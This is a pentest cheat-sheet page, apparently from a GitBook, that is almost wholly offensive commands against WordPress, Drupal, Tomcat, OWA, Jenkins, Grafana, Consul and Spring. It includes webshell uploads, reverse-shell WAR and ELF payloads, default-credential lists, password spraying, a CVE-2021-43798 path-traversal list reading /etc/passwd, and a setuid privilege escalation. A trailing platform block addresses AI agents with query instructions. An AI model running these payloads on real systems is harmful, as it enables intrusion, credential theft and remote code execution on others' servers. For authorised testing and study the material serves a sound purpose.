> For the complete documentation index, see [llms.txt](https://p0db0t.gitbook.io/pentest/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://p0db0t.gitbook.io/pentest/other/cms-servers-others.md).

# CMS / Servers / Others

## 00. Webroot

```bash
/var/www/html/            # Apache	
/usr/local/nginx/html/    # Nginx	
c:\inetpub\wwwroot\       # IIS	
C:\xampp\htdocs\          # XAMPP
```

## 01. Wordpress

* Scan

```bash
## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>

## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>

## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
```

* Bruteforce password/username

```bash
## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>

## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py          
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
```

* Username/Password

```bash
select user_login,user_pass from wp_users;
```

* Webshell

```bash
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i

## Or

## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php

## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php

## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
 
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"                        
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"
```

## 02. Joomla

```bash
## ------------------| Identify version
# Navigate to 
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>

## ------------------| Run scan
joomscan -u <URL>
```

## 03. Drupal

#### 03.1 Enumerations

```bash
## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register

### Check access status 
/user/<number>
/user/1            
### is 403 --> user exist
### is 404 --> doesn't exist

## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ
```

#### 03.2 Upload shell

```bash
## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed

## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save

## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview
```

## 04. Tomcat

```bash
## ------------------| Endpoint permissions
/manager/html      # <--- roles="manager-gui" 
/manager/text/list # <--- roles="manager-script"  [If we have /manager, Then we can use curl to upload war file :)]  
/host-manager/html # <--- roles="admin-gui"

## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/        # <--- not work for upload war files
/notexsits/..;/manager/          # <--- not work for upload war files
## Remember to put '/' at the end ^

## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>

## ------------------| Upload paths
/manager/deploy?war=file&path=/shell    ## Tomcat6
/manager/text/deploy?path=/shell        ## Tomcat7 and above

## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd      

## ------------------| Manually Upload  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
## Then put the shell.war file to \tomcat\webapps\shell.war directory
## Then use \bin\startup.[sh/bat] file to restart the service and extract the war file.
## Now you can use http://<IP>/shell/
```

## 05. Nginx

* [Path traversal via misconfigured NGINX alias.](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)

```bash
## ------------------| If code look like this
location /admin { 
    <--code-->
}

## ------------------| It has LFI; try this
admin../config.php
```

## 05. SharePoint / OWA

#### 05.1 SharePoint

```bash
## ------------------| Important directories 
/_layouts/viewlsts.aspx
```

#### 05.2 OWA

```bash
## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit      
cd SprayingToolkit/
pip3 install -r requirements.txt

## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
```

## 06. Jenkins

* Interesting endpoints

```bash
/manage
/script
```

* Configaration files

```bash
## ------------------| Linux
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/config.xml

## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key 
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
```

* Reset password \[Read full post from [here](https://blog.searce.com/jenkins-change-the-forgotten-password-525169ba1c34)]

```bash
## ------------------| Methord II
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## Bcrypt password will store under <passwordHash> tag [here i used h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins

## ------------------| Decrypt Password
## If you have access to /script then follow below url
## Get password hash from \users\config.xml
hudson.util.Secret.decrypt '<HASH>'
## If not,
## Download following files
\users\admin_17207690984073220035\config.xml
\secrets\master.key 
\secrets\hudson.util.Secret
## Download tool
wget https://raw.githubusercontent.com/gquere/pwn_jenkins/master/offline_decryption/jenkins_offline_decrypt.py
## Execute
python jenkins_offline_decrypt.py master.key hudson.util.Secret config.xml
```

* Remote Code Execution

{% tabs %}
{% tab title="Low level user" %}

* Create New Job

![](/files/8KD53BFy3kHOZ0TKzgAw) ![](/files/QZluL6lZFKdCpiIA2q5b)

* Schedule Method

![](/files/s39jaOg1zbrqjGegekSJ) ![](/files/jcwnM3Qf4AFGXCdKaqsH)

![](/files/lqcRyECWzsvywPUrLlqp) ![](/files/bc2OaanIHvzEPplf2RCQ)

* Trigger Remotely Method

![](/files/DdPDJ2l0m3w5A18AkXHa) ![](/files/emFfI3Jilb0RtWkj0Uaf)

```bash
## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]" 
## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken"             
```

![](/files/YLqE3L4SAv6OeCIyI65R) ![](/files/ZKMhiBiFh3CdrwSxt0E4)
{% endtab %}
{% endtabs %}

## 07. Grafana

* [Best ](https://github.com/jas502n/Grafana-CVE-2021-43798)
* Config files

```bash
## ------------------| 
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
```

* [Unauthorized reading of files in Grafana](https://github.com/Vulnmachines/grafana-unauth-file-read) \[CVE-2021-43798] - [videoPOC](https://www.youtube.com/watch?v=mMEzHP96Jhg)

```bash
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
```

## 08. Consul

```bash
echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p
```

## 09. Spring Framework

* [Spring4Shell \[CVE-2022-22965\]](https://github.com/sunnyvale-it/CVE-2022-22965-PoC)

```bash
### Spring Boot version 2.6.5 
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
```

* Spring Cloud Function Vulnerability(CVE-2022-22963)

```bash
## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'

## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://p0db0t.gitbook.io/pentest/other/cms-servers-others.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
